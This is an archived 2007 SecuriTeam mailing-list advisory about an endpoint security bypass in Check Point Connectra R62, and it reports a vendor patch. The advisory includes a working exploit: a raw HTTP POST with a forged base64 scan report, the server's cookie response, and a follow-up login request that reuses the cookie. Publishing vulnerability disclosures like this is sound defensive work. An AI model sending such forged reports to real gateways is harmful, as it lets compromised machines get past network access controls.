Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[NEWS] Check Point Connectra End Point Security Bypass

from [SecuriTeam] Network Security [Permanent Link]
Subject: [NEWS] Check Point Connectra End Point Security Bypass
Date: 24 Jan 2007 19:36:17 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Check Point Connectra End Point Security Bypass
------------------------------------------------------------------------


SUMMARY

 <http://www.checkpoint.com/products/connectra/index.html> Check Point 
Connectra is "a complete Web Security Gateway that provides SSL VPN access 
and comprehensive endpoint and integrated intrusion prevention. Security 
in a single unified remote access solution. By combining both SSL VPN 
connectivity and security in one solution, organizations can effectively 
deploy SSL VPNs Safely and securely to a diverse set of remote users while 
ensuring the confidentiality and integrity of information that is critical 
to the success of any business".

A vulnerability in the way Check Point's Connectra verifies whether the 
client has passed the required policy or not has been found to be weak 
enough for a malicious attacker to make the Connectra product think the 
client has passed the required policy even if he has not.

DETAILS

Vulnerable Systems:
 * Check Point Connectra R62

A user with a security hazard or a Trojan can bypass the end point 
security tests and login to the network with a security hazard on his 
computer.  The bypass is being done by sending a "good" report to the 
/sre/params.php page after sending the report a set cookie will be send 
from the server to the client. This cookie can be used to bypass the 
endpoint security findings.

Exploit:
POST https://serverip/sre/params.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: ICS_Secure
Host: serverip
Content-Length: 251
Cache-Control: no-cache
Cookie: ICS_Test_Cookie=1

Report=PD94bWwgdmVyc2lvbj0iMS4wIj8+Cgo8U3JlU2NhblJlcG9ydCBWZXJzaW9uPSIzLjcuM
TE2LjAiPgoJPFVzZXJJbmZvIFdpbkRvbWFpbj0iIiBXaW5Vc2VyPSJyb25pIiBXaW5Vc2VyQ2F0Y
WxvZz0iQzpcRG9jdW1lbnRzIGFuZCBTZXR0aW5nc1xyb25pLkxFTk9WTy00RkZFRjRFMyIvPgo8L
1NyZVNjYW5SZXBvcnQ+Cg==

After sending the request a Set-Cookie will be received from the Check 
Point Connectra server

HTTP/1.1 200 OK
Date: Fri, 15 Dec 2006 17:16:19 GMT
Server: CPWS
Last-Modified: Fri, 15 Dec 2006 17:16:19 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: ICSCookie=ffbe7a3740e0db1c2d11b2c6b24c917d; expires=Tue, 13 
Sep
2016 17:16:19 GMT; path=/; secure
Content-Length: 0
Content-Type: text/html

This ICSCookie needs to be copied into the next request

GET https://serverip/Login/Login?LangCode= HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 
1.1.4322; .NET CLR 2.0.50727)
Host: serverip
Connection: Keep-Alive
Cookie: CheckCookieSupport=1; ICSCookie=ffbe7a3740e0db1c2d11b2c6b24c917d

Solution:
Check point released a patch for this vulnerability.

Disclosure Timeline:
20.12.06 - First Identification of the flaw
24.12.06 - Reporting the flaw to checkpoint
27.12.06 - Meeting checkpoint security stuff
22.01.07 - Publishing the vulnerability
22.01.07 - Checkpoint Released a patch for the vulnerability


ADDITIONAL INFORMATION

The information has been provided by  <mailto:roni@avnet.co.il> Roni 
Bachar.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [NEWS] Check Point Connectra End Point Security Bypass, SecuriTeam <=
Previous by Date:  [NEWS] IP Phones Based on PA168 Chipset Have Weak Session Management, SecuriTeam
Next by Date:  [NEWS] OBEX Push Bluetooth DoS, SecuriTeam
Previous by Thread:  [NEWS] IP Phones Based on PA168 Chipset Have Weak Session Management, SecuriTeam
Next by Thread:  [NEWS] OBEX Push Bluetooth DoS, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]